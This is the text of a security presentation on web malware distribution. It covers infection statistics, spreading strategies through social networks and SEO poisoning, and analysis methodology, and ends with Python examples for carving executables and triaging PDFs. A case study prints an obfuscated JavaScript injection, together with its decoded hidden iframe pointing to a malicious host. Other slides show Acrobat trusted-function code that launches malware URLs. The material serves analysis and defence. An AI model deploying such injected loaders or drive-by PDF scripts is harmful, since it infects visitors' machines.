Scaling Web 2.0 Malware Infection
Aditya K Sood, Sr. Security Practitioner
Armorize, Santa Clara, US
Disclaimer
All contents of this presentation represent my own beliefs and views and do not, unless
explicitly stated otherwise, represent the beliefs of my current or, to that effect, any of my
previous employers.
About Me - $whoami
• Senior Security Practitioner, Armorize
http://www.armorize.com
• Founder, SECNICHE Security
http://www.secniche.org
• Worked previously for COSEINC as Senior Security Researcher and as Security Consultant for KPMG
• Author of content for HITB E-Zine, Hakin9, ELSEVIER and USENIX journals
• Likes bug hunting and malware dissection
• Released advisories to forefront companies
• Active speaker at security conferences including RSA, etc.
Agenda
Understanding The Malware Anatomy
The Vertical Risk – Malware Impact on Business
Top 10+ Web Malware Infection Strategies
2X Generation - Century Malware Trickeries
Case Study – Infection through PDF Trusted Functions
Demonstration
Pattern
Understanding The Malware Anatomy
The Dependent Peripherals
Malware Mess – Global Trifecta
Malware Infection Rate
Malware Retrospective and Classification
Top 5 Malware Categories:
Trojan (31.2 %)
Downloader (25.6 %)
Backdoor (13.8 %)
Spyware (13.2 %)
Adware (4.9 %)
Top 5 Virus Families:
Stuh (4.4 %)
Fraudload (3.9 %)
Monder (3.6 %)
Autorun (2.7 %)
Buzus (2.7 %)
Interdependency
Malware - The Impact on Real World
Malware Trends – The Attack Base
Financial abuse and mass identity theft
The mass destructor – Botnet infection and zombie hosts
Exploiting the link dependency – Pay Per click hijacking
Traffic manipulation – Open redirect vulnerabilities at large scale
Spyware, cryptovirology, ransomware, etc.
Distributed Denial of Service – The service death game, extortion
Industry change semantics – Malware activation change line
Infection through browsers and portable gadgets – the biggest step
Exploiting anti-virus loopholes
Malware Contributing Issues – Rising Steps
Publicly available malware source code
Malware distribution frameworks such as MPack, NeoSploit, etc.
Unpatched vulnerabilities and loosely coupled patches
Demand for underground services and self exposure
Global surveillance mode and information stealing in the wild
Software discrepancies and inherited design flaws, e.g. in browsers
Exploitation at the web level is easy, and it opens a door to system-level fallacies
Inappropriate security solutions deployed and an irrelevant security paradigm
Botnet infection – The easy way to launch diversified attacks
Web sharing and centralized work functionality
Pattern
Understanding The Vertical Risk
Web Delivered Malware Impact on Business
Underground Market and Malware Flow Model
Underground Malware Market Business - Statistics
© GDATA
Practical Malware Flow Model
© Reihe Informatik. TR-2007-011
Malware Writers' Role
Flow of Malware Websites
Malware - The Impact on Real World
Pattern
Malware – Sources of Infection
Web 2.0
Top 10 + Strategies of Distributing Malware through Web
Long Live Drive-By Download – Base Web Malware Tactic
(SEO) Poisoning – Driven with Malware
Messengers – Infection at Instant State
Networking Websites – TWITTER Malware Infection
Exploiting the trust relationship on social networking websites
Spreading malware content through tweets, scrapping, etc.
Chain reaction – Spreads very fast across website networks (URL-shortening trick)
Social Networking – FACEBOOK Malware Applications
Manipulating the Open API Calls
User centric control
Exploiting the design fallacies
Social Networking – FACEBOOK MAIL Infection
Step 1
Step 2
Step 3
Online Media Content – YouTube, Google Video, etc.
Exploiting the Web of Trust – Human Touch
Spyware, Ransomware and Other Variants
Insidious Spamming – Email, Blogs, Redirectors, etc.
Botnets – Malware Infection at Large Scale
Direct Malware Hosting – Infected Web Domains
System Stringency – Exploiting the Exceptions
Malware Kits – Automated Infection
Case Study – Safety Labs Malware Infection
Malware infecting the websites of a security service provider.
It is unfortunate that even a security solution provider has been touched by the latest Internet
IFRAME threats, or rather infections.
Thousands of websites on the Internet have been compromised with malicious iframes which load
exploit code designed to silently install trojans onto susceptible victim computers.
Case Study – Safety Labs Malware Infection
Case Study – Safety Labs Malware Infection
Obfuscated JavaScript
<script language=JavaScript>
function mdban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,9,52,47,48,11,7,35,59,56,0,0,0,0,0,0,43,14,20,5,61,19,54,36,15,30,32,38,22,44,29,28,12,2,55,45,51,62,25,13,27,3,17,0,0,0,0,16,0,34,0,58,40,31,60,49,8,50,4,21,53,1,10,33,41,23,24,37,18,26,57,6,39,46,42);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){{w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(221^w&255);w>>=8;s-=2}else{s=6}}}eval(r);}}
mdban('ZT8MVN@ZT8UZFKNZYQYUVN8M9Z3VVN@3DQ5YTKCFZUNSPAXDC6AS8UN34AX0TI5M9QAC0LUYD8C@UQU0LKUZSIYFI8I@2Z@@TE8M8N@FPN39CXHGFKUST0ZMDAXYLY13PL8F3I8MVN5MLE0DMXICGRADF@HC0LUYCX3U0R3Z2KXZLQY830I0LA5SCLXZJXACD8UZGW5YJ0EY2CU@GI5PXH@MTA8076YF2Y8@FQ5Y7@HD')
</script><!-- 213.219.250.100 -->
Script source: http://www.safety-lab.com/audits/categorylist.pl?lang=en
Case Study – Safety Labs Malware Infection
Deobfuscated JavaScript
(1) Decoded JavaScript passed to eval():
window.status = 'DONE';
document.write('<iframe name=5B8F src="http://3pigs.info/t/?' + Math.round(Math.random() * 14490) + '5B8F' + '" width=322 height=45 style="display:none"></iframe>')
(2) Result written by the decoded JavaScript:
<iframe name=5B8F src="http://3pigs.info/t/?58965B8F" width=322 height=45 style="display:none"></iframe>
"http://3pigs.info/t/?58965B8F" was injected as the source of the malicious file.
The complexity factor is always high in decoding malicious JavaScript.
2X Generation Malware Trickeries
System File Patching and Code Injection
Code Interdependency – Malware Adjacency – Code Resuscitation
Code Randomization, Obfuscation and Morphing
Rootkits and System Cloaking
Exploiting ActiveX and JavaScript Heaps – Direct Control
Private & Confidential Property of Armorize
Escaping What !
Malware Analysis Methodology (MAM) - Overview
End Point Communication – Connection state check
  Server identity checks through the communication medium
  Error generation, e.g. checksum integrity
  Encrypted data in packets
  Protocol switching
Session Stream Analysis – Deep Inspection
  Analyzing TCP stream sessions
  Extracting an executable from the raw data
Behavioral Analysis – Scrutinizing system fallacies
  Active debugging
  Black box testing approach
Static Analysis – Reversing the facets of malware
  It is all about analyzing the code of the malware
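The "Extracting an executable from the raw data" step of the session stream analysis above, as an added Python example (written for this page, not the author's own tooling): a carver that walks a reassembled byte stream, validates each MZ/PE header pair, and sizes the image from its section table (largest PointerToRawData + SizeOfRawData), skipping candidates whose data runs past the end of the capture. The header offsets are the PE/COFF file format; the HTTP-wrapped stream and the PE-shaped blob inside it are constructed fixtures, not a real download.

```python
import hashlib
import struct


def build_fake_pe(payload: bytes) -> bytes:
    """Constructed fixture: a PE-shaped blob with a DOS header, a COFF header
    (no optional header) and one section whose raw data sits at 0x200. It is
    not executable; only the fields the carver reads are meaningful."""
    e_lfanew, raw_ptr = 0x40, 0x200
    dos = bytearray(e_lfanew)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)           # e_lfanew -> "PE\0\0"
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x0102)
    # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
    section = struct.pack("<8sIIIIIIHHI", b".text", len(payload), 0x1000,
                          len(payload), raw_ptr, 0, 0, 0, 0, 0x60000020)
    header = bytes(dos) + b"PE\0\0" + coff + section
    return header + b"\0" * (raw_ptr - len(header)) + payload


def carve_pe(stream: bytes) -> list:
    """Return every complete PE image found in a raw byte stream, e.g. the
    server-to-client side of a reassembled TCP session."""
    images, pos = [], 0
    while True:
        mz = stream.find(b"MZ", pos)
        if mz < 0 or mz + 0x40 > len(stream):
            break
        pos = mz + 1
        e_lfanew = struct.unpack_from("<I", stream, mz + 0x3C)[0]
        pe = mz + e_lfanew
        if e_lfanew < 0x40 or pe + 24 > len(stream) or stream[pe:pe + 4] != b"PE\0\0":
            continue                                     # not a PE header
        nsec = struct.unpack_from("<H", stream, pe + 6)[0]
        opt_size = struct.unpack_from("<H", stream, pe + 20)[0]
        sec_tbl = pe + 24 + opt_size
        end = sec_tbl + 40 * nsec
        if nsec == 0 or nsec > 96 or end > len(stream):
            continue                                     # implausible section table
        for i in range(nsec):
            raw_size, raw_ptr = struct.unpack_from("<II", stream, sec_tbl + 40 * i + 16)
            end = max(end, mz + raw_ptr + raw_size)
        if end > len(stream):
            continue                                     # truncated download: skip
        images.append(stream[mz:end])
        pos = end
    return images


def carve_report(stream: bytes) -> list:
    """Offset, size and SHA-256 of each carved image, for the analysis notes."""
    return [{"offset": stream.find(img), "size": len(img),
             "sha256": hashlib.sha256(img).hexdigest()}
            for img in carve_pe(stream)]


# Constructed capture: an HTTP response carrying the fake PE plus unrelated
# trailing bytes, as a reassembled stream might look.
STREAM = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
          + build_fake_pe(b"CONSTRUCTED-PAYLOAD!") + b"\r\n-- trailing bytes --")

if __name__ == "__main__":
    for entry in carve_report(STREAM):
        print(entry)
```

On the constructed stream the carver returns exactly one image of 0x214 bytes starting at the MZ offset; cutting the capture short makes it return nothing rather than a partial file, which is the behaviour you want before hashing or submitting a carved sample.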
Case Study – Malware Infection
PDF Trusted Functions
(Understanding the Facets of Malware)
Some PDF Truths
Hyperlink execution is notified to the user through alerts
Data is not allowed to be stored in the forms
http://secniche.org/papers/SNS_09_03_PDF_Silent_Form_Re_Purp_Attack.pdf
A number of vulnerable functions have been removed, i.e. taken out of the registered state
Support for Adobe Reader 7.xx has been removed
http://blogs.adobe.com/adobereader/2009/12/adobe_reader_and_acrobat_versi.html
Other alerts have been structured as security checks in standalone PDFs
Acrobat JavaScript does not support the DOM as normal (browser) JavaScript does.
Adobe has built-in functionality providing code wrappers that call restricted functions in
specific environments. For example, in general it is not possible to generate another PDF
from a standalone PDF when it is opened.
Understanding Malware Infection - PDF
Exploiting the browser – Downloading files through Windows Media Player
Exploiting the global access of the JavaScript folder in PDF
A hidden gift.js file containing malicious code is placed there
Understanding Malware Infection - PDF
Calling Code through Trusted Functions
The trusted function body calls app.beginPriv() (begin privileges) and app.endPriv() (end
privileges) to enclose whatever function or code is to run as trusted.
The trusted function method can be called successfully at application initialization, and a
certain number of restricted functions can then be called through it.
myTrustedFunction = app.trustedFunction(
    function() { <function body> } );
New Scareware Message – Opening a new PDF
trustedDoc = app.trustedFunction(function (width, height) {
    app.beginPriv();
    var trustDoc = app.newDoc(width, height);
    trustDoc.addWatermarkFromText("X JERKED X");
    app.endPriv();
    return trustDoc;
});
trustedDoc(300, 300);
Understanding Malware Infection - PDF
Calling Code through Trusted Propagator Functions
myPropagatorFunction = app.trustPropagatorFunction(
    function() { <function body> } );
URL Opening – Drive-by Download Infections
trustedDoc = app.trustedFunction(function (cURL, bNewFrame) {
    app.beginPriv();
    var trustedDoc = app.launchURL(cURL, bNewFrame);
    app.endPriv();
    return trustedDoc;
});
trustedDoc("http://www.malware1.com", true);
trustedDoc("http://www.malware2.com", true);
trustedDoc("http://www.malware3.com", true);
trustedDoc("http://www.malware4.com", true);
trustedDoc("http://www.malware5.com", true);
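The defender's counterpart to the two trusted-function slides above, as an added Python example (written for this page; it is not the author's or Adobe's code): a pdfid-style triage pass that counts the dictionary keys which let a PDF act on its own (/OpenAction, /AA, /JS, /JavaScript, /Launch, /URI, ...), pulls the JavaScript out of /JS literal and hex strings, and flags the privileged Acrobat API calls those slides rely on (app.trustedFunction, app.trustPropagatorFunction, app.beginPriv, app.endPriv, app.launchURL, app.newDoc) together with any URL literals. The one-page PDF is constructed for the example, the URL in it is a placeholder, and scripts inside compressed object streams are out of scope (they need inflating first).

```python
import re
from collections import Counter

# Constructed one-page PDF whose /OpenAction runs a trusted-function wrapper of
# the shape shown on the slide. The URL is a placeholder, not a real host.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /S /JavaScript /JS (
trustedDoc = app.trustedFunction(function (cURL, bNewFrame) {
  app.beginPriv();
  var d = app.launchURL(cURL, bNewFrame);
  app.endPriv();
  return d;
});
trustedDoc("http://malware1.example/", true);
) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Dictionary keys that make a PDF act without the reader clicking anything.
RISKY_KEYS = re.compile(r"/(OpenAction|AA|JavaScript|JS|Launch|URI|EmbeddedFile|SubmitForm)\b")
# Acrobat JavaScript calls that only matter inside privileged (trusted) code.
PRIVILEGED_APIS = ["app.trustedFunction", "app.trustPropagatorFunction",
                   "app.beginPriv", "app.endPriv", "app.launchURL",
                   "app.newDoc", "app.openDoc"]
URL_LITERAL = re.compile(r"""["'](https?://[^"'\s]+)["']""")


def pdf_js_strings(pdf: bytes) -> list:
    """JavaScript from /JS (...) literal strings (balanced parentheses,
    backslash escapes honoured) and /JS <...> hex strings."""
    text = pdf.decode("latin-1")
    scripts = []
    for m in re.finditer(r"/JS\s*\(", text):
        i, depth = m.end(), 1
        start = i
        while i < len(text) and depth:
            c = text[i]
            if c == "\\":          # skip escaped character
                i += 2
                continue
            depth += (c == "(") - (c == ")")
            i += 1
        scripts.append(text[start:i - 1])
    for m in re.finditer(r"/JS\s*<([0-9A-Fa-f\s]*)>", text):
        scripts.append(bytes.fromhex("".join(m.group(1).split())).decode("latin-1"))
    return scripts


def triage_pdf(pdf: bytes) -> dict:
    """Summarise why a PDF deserves a closer look: action keys present, the
    privileged Acrobat APIs its scripts call, and URL literals they carry."""
    text = pdf.decode("latin-1")
    keys = Counter("/" + m.group(1) for m in RISKY_KEYS.finditer(text))
    scripts = pdf_js_strings(pdf)
    joined = "\n".join(scripts)
    indicators = [api for api in PRIVILEGED_APIS
                  if re.search(r"\b" + re.escape(api) + r"\s*\(", joined)]
    wrapper = any(api in indicators
                  for api in ("app.trustedFunction", "app.trustPropagatorFunction"))
    return {"keys": keys, "scripts": len(scripts), "indicators": indicators,
            "urls": URL_LITERAL.findall(joined), "privileged_wrapper": wrapper}


if __name__ == "__main__":
    for k, v in triage_pdf(SAMPLE_PDF).items():
        print(f"{k}: {v}")
```

For the constructed file the report shows /OpenAction plus /JS, the four privileged calls of the launchURL wrapper, the placeholder URL, and privileged_wrapper set, which is the combination worth escalating: a document-level script has no business defining trusted functions, and a launchURL inside one is exactly the drive-by pattern of the slide.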
Understanding Malware Infection - PDF
Demonstration
Questions and Queries
Thanks and Regards
Special thanks to Armorize for pushing me to do more research.
http://www.armorize.com
Portal and Blog
SecNiche Security – http://www.secniche.org | http://zeroknock.blogspot.com
(Screenshots shared from various resources)